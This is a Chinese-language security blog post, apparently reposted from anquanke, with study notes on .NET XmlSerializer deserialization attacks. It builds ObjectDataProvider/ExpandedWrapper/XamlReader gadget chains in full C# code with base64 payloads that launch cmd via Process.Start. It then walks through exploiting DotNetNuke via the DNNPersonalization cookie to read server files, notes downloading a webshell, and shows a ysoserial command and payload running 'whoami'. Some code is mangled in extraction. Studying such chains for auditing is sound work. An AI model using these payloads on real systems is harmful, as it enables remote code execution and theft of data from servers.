.NET序列化學習之XmlSerializer(.NET序列化學習之XmlSerializer)
2023-10-13 08:57:01 2
結構化XML數據映射為.NET對象,XmlSerializer 類的程序中通過單個API 調用來執行XML文檔和對象之間的轉換,轉換後會在.NET類中元數據屬性來表示,當Web程序,用戶可控Type類的靜態方法獲取數據,並調用Deserialize反序列化xml數據就會觸發反序列化漏洞攻擊。(本文主要是一次對.net 序列化漏洞的學習筆記,如本文有錯誤、還請大佬們多多指點)
XmlSerialize 反序列化序列化過程using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows;using System.Windows.Controls;using System.Windows.Data;using System.Windows.Documents;using System.Windows.Input;using System.Windows.Media;using System.Windows.Media.Imaging;using System.Windows.Navigation;using System.Windows.Shapes;using System.Xml;using System.IO;using System.Xml.Serialization;using System.Xml.Linq;namespace WPFApp1{ [XmlRoot] public class TestClass { private string classname; private string name; private int age; [XmlAttribute] public string Classname { get => classname; set => classname = value; } [XmlElement] public string Name { get => name; set => name = value; } [XmlElement] public int Age { get => age; set => age = value; } public override string ToString { return base.ToString; } } /// /// MainWindow.XAML 的交互邏輯 /// public partial class MainWindow : Window { public MainWindow { InitializeComponent; TestClass testClass = new TestClass; testClass.Classname = "test"; testClass.Name = "0xdd"; testClass.Age = 18; FileStream FileStream = File.OpenWrite(@"C:\Windows\Temp\log.txt"); using (TextWriter writer = new StreamWriter(fileStream)) { XmlSerializer serialize = new XmlSerializer(typeof(TestClass)); serialize.Serialize(writer, testClass); } } }}
成功生成xml 數據 在 log.txt
將xml 文件 轉換為對象是通過創建一個新對象的方式調用,XmlSerializer.Deserialize 方法實現,在序列化最關鍵的一環當屬new XmlSerializer 構造方法裡所傳的參數,這個參數來自System.Type類 ,通過這個類可以訪問關於任意數據類型的信息,指向任何給類型的Type 引用 有以下三種方式
typeof
實例化的XmlSerializer 傳入的typeof(TestClass) 表示獲取TestClass類的Typetypeof是C#中的運算符,所傳的參數只能是類型的名稱,而不能是實例化的對象,如下Demo
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows;using System.Windows.Controls;using System.Windows.Data;using System.Windows.Documents;using System.Windows.Input;using System.Windows.Media;using System.Windows.Media.Imaging;using System.Windows.Navigation;using System.Windows.Shapes;using System.Xml;using System.IO;using System.Xml.Serialization;using System.Xml.Linq;namespace WpfApp1{ [XmlRoot] public class TestClass { private string classname; private string name; private int age; [XmlAttribute] public string Classname { get => classname; set => classname = value; } [XmlElement] public string Name { get => name; set => name = value; } [XmlElement] public int Age { get => age; set => age = value; } public override string ToString { return base.ToString; } } /// /// MainWindow.xaml 的交互邏輯 /// public partial class MainWindow : Window { public MainWindow { InitializeComponent; TestClass testClass = new TestClass; //testClass.Classname = "test"; //testClass.Name = "0xdd"; //testClass.Age = 18; //FileStream fileStream = File.OpenWrite(@"C:\Windows\Temp\log.txt"); //using (TextWriter writer = new StreamWriter(fileStream)) //{ // XmlSerializer serialize = new XmlSerializer(typeof(TestClass)); // serialize.Serialize(writer, testClass); //} using (var stream = new FileStream(@"C:\Windows\Temp\log.txt", FileMode.Open)) { var serializers = new XmlSerializer(typeof(TestClass)); testClass = serializers.Deserialize(stream) as TestClass; } MessageBox.Show(testClass.Name); } }}
通過typeof 獲取Type 之後就能得到該類中所有的Methods、Members等信息 ,下圖在運行時、通過反序列化在對話框獲取了當前成員Name的值
object.Type
在.NET裡所有的類最終都派生自System.Object , 在Object 類中定義了許多公有和受保護的成員方法,這些方法可用於自己定義的所有其他類中,GetType方法就是其中的一個,該方法放回從System.Type派生的類 的一個實例,因為可以提供對象成員和所屬類的信息,包括基本類型、方法、屬性等,上述案例中實例化TestClass,再獲取當前實例的Type
using (var stream = new FileStream(@"C:\Windows\Temp\log.txt", FileMode.Open)) { var serializers = new XmlSerializer(testClass.GetType); testClass = serializers.Deserialize(stream) as TestClass; } MessageBox.Show(testClass.Name); }
Type.GetType
第三種方法是Type類的靜態方法GetType,這個方法允許外界傳入字符串,只需要傳入全限定名就可以調用該類中的方法、屬性等
using (var stream = new FileStream(@"C:\Windows\Temp\log.txt", FileMode.Open)) { var serializers = new XmlSerializer(Type.GetType("WpfApp1.TestClass")); testClass = serializers.Deserialize(stream) as TestClass; } MessageBox.Show(testClass.Name);
打造攻擊鏈ObjectDataProvider
ObjectDataProvider 類,它位於System.Windows.Data 命名空間下,可以調用任意被引用類中的的方法,提供成員ObjectInstance用類似實例化類、成員MethodName調用指定類型的方法的名稱、成員MethodParameters表示傳遞給方法的參數
demo
ObjectDataProvider object1 = new ObjectDataProvider; object1.ObjectInstance = new TestClass; object1.MethodName = "ClassMethod"; object1.MethodParameters.Add("calc.exe");
因為直接用XmlSerializer 序列化會拋出異常,因為再序列化過程中 ObjectInstance 類型未知,可以使用ExpandedWrapper 擴展類再系統內部預先加載相關實體的查詢來避免異常錯誤,改寫Demo
ExpandedWrapper wrapper = new ExpandedWrapper; wrapper.ProjectedProperty0 = new ObjectDataProvider; wrapper.ProjectedProperty0.ObjectInstance = new TestClass; wrapper.ProjectedProperty0.MethodName = "ClassMethod"; wrapper.ProjectedProperty0.MethodParameters.Add("notepad.exe"); XmlSerializer serializer1 = new XmlSerializer(typeof(ExpandedWrapper)); TextWriter textWriter2 = new StreamWriter(@"C:\Windows\temp\ser.xml"); serializer1.Serialize(textWriter2, wrapper); textWriter2.Close;
ExpandedWrapper 需要使用引用 System.Data.Services.Internal;
完整WPFdemo
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows;using System.Windows.Controls;using System.Windows.Data;using System.Windows.Documents;using System.Windows.Input;using System.Windows.Media;using System.Windows.Media.Imaging;using System.Windows.Navigation;using System.Windows.Shapes;using System.Xml;using System.IO;using System.Xml.Serialization;using System.Xml.Linq;using System.Data.Services.Internal;namespace WpfApp1{ [XmlRoot] public class TestClass { private string classname; private string name; private int age; public void ClassMethod(string command) { System.Diagnostics.Process cmd_run = new System.Diagnostics.Process; cmd_run.StartInfo.FileName = "cmd.exe"; cmd_run.StartInfo.UseShellExecute = false; cmd_run.StartInfo.RedirectStandardError = true; cmd_run.StartInfo.RedirectStandardOutput = true; cmd_run.StartInfo.RedirectStandardInput = true; cmd_run.StartInfo.Arguments = "/c" command; cmd_run.Start; } [XmlAttribute] public string Classname { get => classname; set => classname = value; } [XmlElement] public string Name { get => name; set => name = value; } [XmlElement] public int Age { get => age; set => age = value; } public override string ToString { return base.ToString; } } /// /// MainWindow.xaml 的交互邏輯 /// public partial class MainWindow : Window { public MainWindow { InitializeComponent; using (var stream = new FileStream(@"C:\Windows\Temp\log.txt", FileMode.Open)) { var serializers = new XmlSerializer(Type.GetType("WpfApp1.TestClass")); testClass = serializers.Deserialize(stream) as TestClass; } MessageBox.Show(testClass.Name); ExpandedWrapper wrapper = new ExpandedWrapper; wrapper.ProjectedProperty0 = new ObjectDataProvider; wrapper.ProjectedProperty0.ObjectInstance = new TestClass; wrapper.ProjectedProperty0.MethodName = "ClassMethod"; wrapper.ProjectedProperty0.MethodParameters.Add("notepad.exe"); XmlSerializer serializer1 = new XmlSerializer(typeof(ExpandedWrapper)); TextWriter textWriter2 = new StreamWriter(@"C:\Windows\temp\ser.xml"); serializer1.Serialize(textWriter2, wrapper); textWriter2.Close; } }}
生成內容:
0 ClassMethod notepad.exe
這樣攻擊鏈第一步就完成了,但是因為這裡測試環境 TestClass類 存在ClassMethod 方法 可以執行命令,但在實際的生產環境中是非常複雜的,所以為了使攻擊成本降低需要調用系統類取達到命令執行。
ResourceDictionary
ResourceDictionary,稱為資源字典通常出現在WPF或UWP應用程式中用來在多個程序集間共享靜態資源,既然是WPF程序,必然設計到前端UI設計語言XAML,XAML全程 Extensible Application Markup Language (可擴展應用程式標記語言) 基於XML的,且XAML是以一個樹形結構作為整體
參考來源於Ivan1ee師傅的.NET高級代碼審計
x:Type 相當於C#中typeof運算符功能,這裡傳遞的值是System.Diagnostics.Process;MethodName 用來獲取或設置調用的方法的名稱,傳遞的值為System.Diagonstics.Process.Start 方法用來啟動一個進程
第三個標籤 ObjectDataProvider.MethodParameters 內嵌了兩個方法參數標籤,通過 System:String 分別指定了啟動文件和啟動時所帶參數供Start方法使用XAML概述
可擴展應用程式標記語言 (XAML) 是一種基於 XML 的聲明性語言。XAML 廣泛用於以下類型的應用程式以構建用戶界面 -Windows Presentation Foundation (WPF) 應用 -通用 Windows 平臺 (UWP) 應用 -Xamarin.Forms 應用
XAML demo 用途
使用Button Click 0xdd 創建按鈕
XamlReader
XamlReader 位於System.Windows.Markup 空間下,主要用來讀取XAML文件,默認的XAML讀取器,通過Load讀取STream流中的XAML數據,並返回作為根對象,Parse方法讀取指定字符串的XAML輸入,也同樣返回作為根對象。
https://docs.microsoft.com/en-us/dotnet/api/system.windows.markup.xamlreader?view=windowsdesktop-6.0
使用ObjectDataProvider 的ObjectInstance 方法實例化XamlReader 再指定MethodName 為Parse,並且給 MethodParameters 傳遞序列化之後的資源字典數據,這樣就可以完成XmlSerializer 反序列化攻擊鏈的打造。
實例ObjectDataProvider 實例化XamlReader 調用過程xmlstudy.xml
0x01 xmlns:Diag 引用了System.Diagnostics 命令空間起名為Diag0x02 x:key 起名為LaunchCalch 這個值也可為空,在xaml語法中, Key這個鍵值必須有0x03 ObjectType 表示對象類型0x04 x:Type 相等於 typeof0x05 MethodName 是ObjectDataProvider 的屬性,值為Start、指定調用Start方法0x06 Diag:Process 等同於 System.Diagnostics.Process
cmd.exe /c calc.exe
調用過程 使XamlReader Parse方法 接收指定的 xml 數據
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows;using System.Windows.Controls;using System.Windows.Data;using System.Windows.Documents;using System.Windows.Input;using System.Windows.Media;using System.Windows.Media.Imaging;using System.Windows.Navigation;using System.Windows.Shapes;using System.Xml;using System.IO;using System.Xml.Serialization;using System.Xml.Linq;using System.Data.Services.Internal;using System.Windows.Markup;namespace WpfApp1{ /// /// MainWindow.xaml 的交互邏輯 /// public partial class MainWindow : Window { public MainWindow { InitializeComponent; ExpandedWrapper wrapper = new ExpandedWrapper; wrapper.ProjectedProperty0 = new ObjectDataProvider; wrapper.ProjectedProperty0.ObjectInstance = new XamlReader; wrapper.ProjectedProperty0.MethodName = "Parse"; wrapper.ProjectedProperty0.MethodParameters.Add(File.ReadAllText(@"C:\WIndows\temp\xmlstudy.xml")); } }}
demo
ysoserial.exe -g ObjectDataProvider -calc -f xmlserializer
Parse <![CDATA[cmd/c alc]]>
cmd /c alc
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows;using System.Windows.Controls;using System.Windows.Data;using System.Windows.Documents;using System.Windows.Input;using System.Windows.Media;using System.Windows.Media.Imaging;using System.Windows.Navigation;using System.Windows.Shapes;using System.Xml;using System.IO;using System.Xml.Serialization;using System.Xml.Linq;using System.Data.Services.Internal;using System.Windows.Markup;namespace WpfApp1{ /// /// MainWindow.xaml 的交互邏輯 /// public partial class MainWindow : Window { public MainWindow { InitializeComponent; string p = "PFJlc291cmNlRGljdGlvbmFyeSAKICAgICAgICAgICAgICAgICAgICB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiAKICAgICAgICAgICAgICAgICAgICB4bWxuczpkPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIgCiAgICAgICAgICAgICAgICAgICAgeG1sbnM6Yj0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiIAogICAgICAgICAgICAgICAgICAgIHhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIGQ6S2V5PSIiIE9iamVjdFR5cGU9IntkOlR5cGUgYzpQcm9jZXNzfSIgTWV0aG9kTmFtZT0iU3RhcnQiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPGI6U3RyaW5nPmNtZDwvYjpTdHJpbmc CiAgICAgICAgICAgIDxiOlN0cmluZz4vYyBjYWxjPC9iOlN0cmluZz4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI CjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pg=="; byte[] vs = Convert.FromBase64String(p); string xml = Encoding.UTF8.GetString(vs); XmlDeserialize(xml); } public static void XmlDeserialize(string o) { XamlReader.Parse(o); } }}
匯總來說攻擊鏈分了2種形式
ObjectDataProvider – > Class.Evil 該種方法 需要代碼中有類含有惡意的方法ObjectDataProvider – > XamlReader.Parse – > ObjectDataProvider -> System.Diagnostics.Process.Start(「cmd.exe」,」/c notepad.exe」) 通用調用XmlSerialize 代碼審計視角DNN Platform 漏洞版本下載地址
入口點通過dNSpy工具 對代碼進行審計,根據漏洞描述,我們可以明確,通過設定Cookie DNNPersonalization 的值 造成遠程代碼執行
從代碼41中行可以看出,當 if(userId > Null.NullInteger) 條件不滿足時 會從Cookie中取出DNNPersonalization 的值, 賦值給text 並由 Globals.DeserializeHashTableXml(text)) 傳入XmlUtils.DeSerializeHashtable 函數
繼續跟進 DeSerializeHashtable
XmlDocument 命名空間:System.xml 表示 XML 文檔。 可使用此類在文檔中加載、驗證、編輯、添加和放置 XML。詳細可參考 https://docs.microsoft.com/zh-cn/dotnet/api/system.xml.xmldocument?view=net-6.0
XmlElement 命名空間:System.xml 元素可以有與之關聯的屬性,例如使用 GetAttribute 方法 返回具有指定名稱的屬性的值。https://docs.microsoft.com/zh-cn/dotnet/api/system.xml.xmlelement?view=net-6.0
分析函數功能,
1.初始化了XmlDocumnet,並通過LoadXml 傳入xmlSource,通過 xmlDocument.SelectNodes(rootname 「/item」) 進行選擇匹配 XPath 表達式的節點列表。
rootname的值 為 return XmlUtils.DeSerializeHashtable(Source, 「profile」); 傳入的 profile,那麼獲取的為標籤中的值
2.通過傳入的xml數據,使用xmlElement.GetAttribute 獲取 type 屬性的值,並生成XmlSerializer實例, 通過代碼160-163行 可以看到此時 type 和xmlReader 我們都是可控的
首先上文已經提到了2條攻擊鏈的形式
1.利用本身程序的方法具體大家想使用哪個方法,都可以自行查找一些由價值的方法,這裡舉一個讀文件的例子,在 DotNetNuke.Common.Utilities.FileSystemUtils 中
按照上文所說的打造攻擊鏈,使用 ExpandedWrapper 進行Payload 構造
需要添加 DoNetNuke.dll DotNetNuke.Instrumentation.dll 引用
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Windows;using System.Threading.Tasks;using System.Windows.Data;using System.Xml.Linq;using System.IO;using System.Xml.Serialization;using DotNetNuke.Common.Utilities;using System.Data.Services.Internal;namespace ConsoleApp11{ class Program { static void Main(string[] args) { ExpandedWrapper wrapper = new ExpandedWrapper; XmlSerializer serializer1 = new XmlSerializer(typeof(ExpandedWrapper)); Type GetobjType = typeof(ExpandedWrapper); Console.Write(GetobjType.AssemblyQualifiedName); wrapper.ProjectedProperty0 = new ObjectDataProvider; wrapper.ProjectedProperty0.ObjectInstance = new FileSystemUtils; wrapper.ProjectedProperty0.MethodName = "WriteFile"; wrapper.ProjectedProperty0.MethodParameters.Add("C:\\Windows\\Temp\\0xdd.txt"); TextWriter textWriter2 = new StreamWriter(@"C:\Windows\temp\ser.xml"); serializer1.Serialize(textWriter2, wrapper); textWriter2.Close; } }}
運行後生成出了 Payload 並獲取了type
type
System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils, DotNetNuke, Version=9.1.0.367, Culture=neutral, PublicKeyToken=null],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
根據上面讀取DeSerializeHashtable方法的代碼,我們還要構造以下xml,使程序可以成功讀取type 和xml數據,
WriteFileC:\inetpub\wwwroot\0xdd.txt
請求一個404的頁面,在cookie 中DNNPersonalization 傳入數據,成功獲取到文件內容
當然,也可以利用DotNetNuke.Common.Utilities.FileSystemUtils中的 PullFile 把遠程的文件,下載到指定目錄 (例:下載Webshell至指定目錄)
ObjectStateFormatter 一般用於序列化和反序列化狀態對象圖,位於命名空間System.Web.UI、 Deserialize 方法 支持函數多態,可以處理二進位數據、BASE64數據
可以直接利用.net ysoserial 工具 生成DotNetNuke ObjectStateFormatter利用的payload
.net ysoserial 工具
ysoserial.exe -p DotNetNuke -m run_command -c whoami
Deserialize/wEykgcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAC0BTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8 DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyB3aG9hbWkiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI Cw==
可以發現關鍵點 type和xmlReader 可控,除了DotNetNuke 使用了XmlSerialize,還可以嘗試用SharePoint 進行練手
參考:https://www.anquanke.com/post/id/172316
本文由0xdd原創發布轉載,請參考轉載聲明,註明出處: https://www.anquanke.com/post/id/262781安全客 - 有思想的安全新媒體
,
![2022愛方向和生日是在[質量個性]中](http://img.xinsiji.cc/20220215/1604989894118215680.jpg)
